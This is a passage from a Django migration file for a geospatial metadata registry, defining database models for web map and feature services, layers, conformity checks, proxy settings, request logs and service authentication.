('format', models.CharField(blank=True, choices=[(None, '---'), ('Database', 'Database'), ('Esri shape', 'Esri shape'), ('CSV', 'CSV'), ('GML', 'GML'), ('GeoTIFF', 'GeoTIFF')], help_text='The format in which the described dataset is stored.', max_length=20, null=True, verbose_name='format')),
('charset', models.CharField(blank=True, choices=[(None, '---'), ('utf8', 'utf8')], help_text='The charset which is used by the stored data.', max_length=10, null=True, verbose_name='charset')),
('inspire_top_consistence', models.BooleanField(default=False, help_text='Flag to signal if the described data has a topologically consistence.')),
('preview_image', models.ImageField(blank=True, null=True, upload_to='')),
('lineage_statement', models.TextField(blank=True, null=True)),
('update_frequency_code', models.CharField(blank=True, choices=[('annually', 'annually'), ('asNeeded', 'asNeeded'), ('biannually', 'biannually'), ('irregular', 'irregular'), ('notPlanned', 'notPlanned'), ('unknown', 'unknown')], max_length=20, null=True)),
('bounding_geometry', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326)),
('dataset_id', models.CharField(help_text='identifier of the remote data', max_length=4096, null=True)),
('dataset_id_code_space', models.CharField(blank=True, default='', help_text='code space for the given identifier', max_length=4096)),
('inspire_interoperability', models.BooleanField(default=False, help_text='flag to signal if this ')),
],
options={
'verbose_name': 'dataset metadata',
'verbose_name_plural': 'dataset metadata',
},
),
migrations.CreateModel(
name='DatasetMetadataConformityCheckRun',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passed', models.BooleanField(blank=True, null=True)),
('report', models.TextField(blank=True, null=True)),
('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='DatasetMetadataRelation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('relation_type', models.CharField(choices=[(None, '---'), ('visualizes', 'visualizes'), ('describes', 'describes'), ('harvestedThrough', 'harvestedThrough'), ('harvestedParent', 'harvestedParent'), ('publishedBy', 'publishedBy')], max_length=20)),
('is_internal', models.BooleanField(default=False, help_text='true means that this relation is created by a user and the dataset is maybe not linked in a capabilities document for example.', verbose_name='internal relation?')),
('origin', models.CharField(choices=[(None, '---'), ('Capabilities', 'Capabilities'), ('Upload', 'Upload'), ('Editor', 'Editor'), ('Catalogue', 'Catalogue')], help_text='determines where this relation was found or it is added by a user.', max_length=20, verbose_name='origin')),
],
),
migrations.CreateModel(
name='Dimension',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='the type of the content stored in extent field.', max_length=50, verbose_name='name')),
('units', models.CharField(help_text='measurement units specifier', max_length=50, verbose_name='units')),
('parsed_extent', models.TextField(help_text='The extent string declares what value(s) along the Dimension axis are appropriate for this specific geospatial data object.', verbose_name='extent')),
],
),
migrations.CreateModel(
name='FeatureType',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('describe_feature_type_document', models.TextField(help_text='the fetched content of the download describe feature type document.', null=True, verbose_name='describe feature type')),
],
options={
'verbose_name': 'feature type',
'verbose_name_plural': 'feature types',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='FeatureTypeConformityCheckRun',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passed', models.BooleanField(blank=True, null=True)),
('report', models.TextField(blank=True, null=True)),
('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='FeatureTypeElement',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('max_occurs', models.IntegerField(default=1)),
('min_occurs', models.IntegerField(default=0)),
('name', models.CharField(max_length=255)),
('data_type', models.CharField(blank=True, max_length=255, null=True)),
('required', models.BooleanField(default=False)),
],
options={
'verbose_name': 'feature type element',
'verbose_name_plural': 'feature type elements',
'ordering': ['-name'],
},
),
migrations.CreateModel(
name='HarvestResult',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('result_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.harvest.result_file_path)),
],
),
migrations.CreateModel(
name='HttpRequestLog',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField()),
('elapsed', models.DurationField()),
('method', models.CharField(max_length=20)),
('url', models.URLField(max_length=4096)),
('body', models.FileField(max_length=1024, upload_to=registry.models.security.request_body_path)),
('headers', models.JSONField(default=dict)),
],
),
migrations.CreateModel(
name='HttpResponseLog',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status_code', models.IntegerField(default=0)),
('reason', models.CharField(max_length=50)),
('elapsed', models.DurationField()),
('headers', models.JSONField(default=dict)),
('url', models.URLField(max_length=4096)),
('content', models.FileField(max_length=1024, upload_to=registry.models.security.response_content_path)),
],
),
migrations.CreateModel(
name='Keyword',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(db_index=True, max_length=255, unique=True)),
],
options={
'ordering': ['keyword'],
},
),
migrations.CreateModel(
name='Layer',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('preview_image', models.ImageField(blank=True, null=True, upload_to='')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('is_queryable', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer provides factual information or not. Parsed from capabilities.', verbose_name='is queryable')),
('is_opaque', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer support transparency content or not. Parsed from capabilities.', verbose_name='is opaque')),
('is_cascaded', models.BooleanField(default=False, editable=False, help_text='WMS cascading allows to expose layers coming from other WMS servers as if they were local layers', verbose_name='is cascaded')),
('scale_min', models.FloatField(blank=True, editable=False, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale minimum value')),
('scale_max', models.FloatField(blank=True, editable=False, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale maximum value')),
('lft', models.PositiveIntegerField(editable=False)),
('rght', models.PositiveIntegerField(editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(editable=False)),
],
options={
'verbose_name': 'layer',
'verbose_name_plural': 'layers',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='LayerConformityCheckRun',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passed', models.BooleanField(blank=True, null=True)),
('report', models.TextField(blank=True, null=True)),
('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LegendUrl',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legend_url', models.URLField(editable=False, help_text='contains the location of an image of a map legend appropriate to the enclosing Style.', max_length=4096)),
('height', models.IntegerField(editable=False, help_text='the size of the image in pixels')),
('width', models.IntegerField(editable=False, help_text='the size of the image in pixels')),
],
),
migrations.CreateModel(
name='Licence',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('identifier', models.CharField(max_length=255, unique=True)),
('symbol_url', models.URLField(null=True)),
('description', models.TextField()),
('description_url', models.URLField(null=True)),
('is_open_data', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='MapContext',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='a short descriptive title for this map context', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the topic of this map context', null=True, verbose_name='abstract')),
],
),
migrations.CreateModel(
name='MapContextLayer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='an identifying name for this map context layer', max_length=1000, verbose_name='name')),
('title', models.CharField(blank=True, help_text='a short descriptive title for this map context layer', max_length=1000, null=True, verbose_name='title')),
('layer_scale_min', models.FloatField(blank=True, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale minimum value')),
('layer_scale_max', models.FloatField(blank=True, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale maximum value')),
('preview_image', models.ImageField(blank=True, help_text='A preview image for the Map Context Layer', null=True, upload_to=registry.models.mapcontext.preview_image_file_path, verbose_name='preview image')),
('lft', models.PositiveIntegerField(editable=False)),
('rght', models.PositiveIntegerField(editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(editable=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='MetadataContact',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', help_text='The name of the organization', max_length=256, verbose_name='Name')),
('person_name', models.CharField(default='', max_length=200, verbose_name='Contact person')),
('email', models.EmailField(default='', max_length=100, verbose_name='E-Mail')),
('phone', models.CharField(default='', max_length=100, verbose_name='Phone')),
('facsimile', models.CharField(default='', max_length=100, verbose_name='Facsimile')),
('city', models.CharField(default='', max_length=100, verbose_name='City')),
('postal_code', models.CharField(default='', max_length=100, verbose_name='Postal code')),
('address_type', models.CharField(default='', max_length=100, verbose_name='Address type')),
('address', models.CharField(default='', max_length=100, verbose_name='Address')),
('state_or_province', models.CharField(default='', max_length=100, verbose_name='State or province')),
('country', models.CharField(default='', max_length=100, verbose_name='Country')),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='MimeType',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mime_type', models.CharField(db_index=True, help_text='The Internet Media Type', max_length=500, unique=True, verbose_name='mime type')),
],
),
migrations.CreateModel(
name='OGCOperation',
fields=[
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], max_length=30, primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='ProxySetting',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('camouflage', models.BooleanField(default=False, help_text='if true, all related xml documents are secured, by replace all hostname/internet addresses of the related service by the hostname of the current mr. map instance.', verbose_name='camouflage')),
('log_response', models.BooleanField(default=False, help_text='if true, all responses of the related service will be logged.', verbose_name='log response')),
],
),
migrations.CreateModel(
name='ReferenceSystem',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=100)),
('prefix', models.CharField(choices=[(None, '---'), ('EPSG', 'EPSG')], default='EPSG', max_length=255)),
],
options={
'ordering': ['-code'],
},
),
migrations.CreateModel(
name='Rule',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('field_name', models.TextField(choices=[('title', 'title'), ('abstract', 'abstract'), ('access_constraints', 'access_constraints'), ('keywords', 'keywords'), ('formats', 'formats'), ('reference_system', 'reference_system')])),
('property', models.TextField(choices=[('len', 'len'), ('count', 'count')])),
('operator', models.TextField(choices=[('>', '>'), ('>=', '>='), ('<', '<'), ('<=', '<='), ('==', '=='), ('!=', '!=')])),
('threshold', models.TextField(null=True)),
],
),
migrations.CreateModel(
name='ServiceAccessGroup',
fields=[
('group_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.group')),
('description', models.CharField(help_text='a short description what this group is for.', max_length=512, verbose_name='description')),
],
bases=('auth.group',),
managers=[
('objects', django.contrib.auth.models.GroupManager()),
],
),
migrations.CreateModel(
name='WebFeatureService',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('keywords', models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='webfeatureservice_metadata', related_query_name='webfeatureservice_metadata', to='registry.Keyword', verbose_name='keywords')),
('licence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence')),
('metadata_contact', models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_webfeatureservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact')),
('service_contact', models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_webfeatureservice_metadata', to='registry.metadatacontact', verbose_name='service contact')),
],
options={
'verbose_name': 'web feature service',
'verbose_name_plural': 'web feature services',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='WebMapService',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('keywords', models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='webmapservice_metadata', related_query_name='webmapservice_metadata', to='registry.Keyword', verbose_name='keywords')),
('licence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence')),
('metadata_contact', models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_webmapservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact')),
('service_contact', models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_webmapservice_metadata', to='registry.metadatacontact', verbose_name='service contact')),
],
options={
'verbose_name': 'web map service',
'verbose_name_plural': 'web map services',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
),
migrations.CreateModel(
name='ConformityCheckConfigurationExternal',
fields=[
('conformitycheckconfiguration_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='registry.conformitycheckconfiguration')),
('external_url', models.URLField(max_length=1000, null=True)),
('parameter_map', models.JSONField()),
('polling_interval_seconds', models.IntegerField(blank=True, default=5)),
('polling_interval_seconds_max', models.IntegerField(blank=True, default=300)),
],
bases=('registry.conformitycheckconfiguration',),
),
migrations.CreateModel(
name='ConformityCheckConfigurationInternal',
fields=[
('conformitycheckconfiguration_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='registry.conformitycheckconfiguration')),
],
bases=('registry.conformitycheckconfiguration',),
),
migrations.CreateModel(
name='WmsConformityCheckRun',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passed', models.BooleanField(blank=True, null=True)),
('report', models.TextField(blank=True, null=True)),
('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
('config', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration')),
('service', models.ForeignKey(help_text='the service targeted by this check', on_delete=django.db.models.deletion.CASCADE, to='registry.webmapservice', verbose_name='service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceRemoteMetadata',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.URLField(help_text='the url where the metadata could be downloaded from.', max_length=4094, verbose_name='download link')),
('remote_content', models.TextField(help_text='the fetched content of the download url.', null=True, verbose_name='remote content')),
('object_id', models.UUIDField(help_text='the uuid of the described service, layer or feature type', verbose_name='described resource')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
('service', models.ForeignKey(help_text='the service where this remote metadata is related to. This remote metadata was found in the GetCapabilites document of the related service.', on_delete=django.db.models.deletion.CASCADE, related_name='remote_metadata', related_query_name='remote_metadata', to='registry.webmapservice', verbose_name='web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceOperationUrl',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method you can perform for this url', max_length=10, verbose_name='http method')),
('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
('mime_types', models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='webmapserviceoperationurl_operation_urls', related_query_name='webmapserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type')),
('service', models.ForeignKey(editable=False, help_text='the web map service for that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.webmapservice', verbose_name='related web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebMapServiceAuthentication',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='kind of authentication mechanism shall used.', max_length=100, verbose_name='authentication type')),
('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
('service', models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.webmapservice', verbose_name='web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceRemoteMetadata',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.URLField(help_text='the url where the metadata could be downloaded from.', max_length=4094, verbose_name='download link')),
('remote_content', models.TextField(help_text='the fetched content of the download url.', null=True, verbose_name='remote content')),
('object_id', models.UUIDField(help_text='the uuid of the described service, layer or feature type', verbose_name='described resource')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
('service', models.ForeignKey(help_text='the service where this remote metadata is related to. This remote metadata was found in the GetCapabilites document of the related service.', on_delete=django.db.models.deletion.CASCADE, related_name='remote_metadata', related_query_name='remote_metadata', to='registry.webfeatureservice', verbose_name='web map service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceOperationUrl',
fields=[
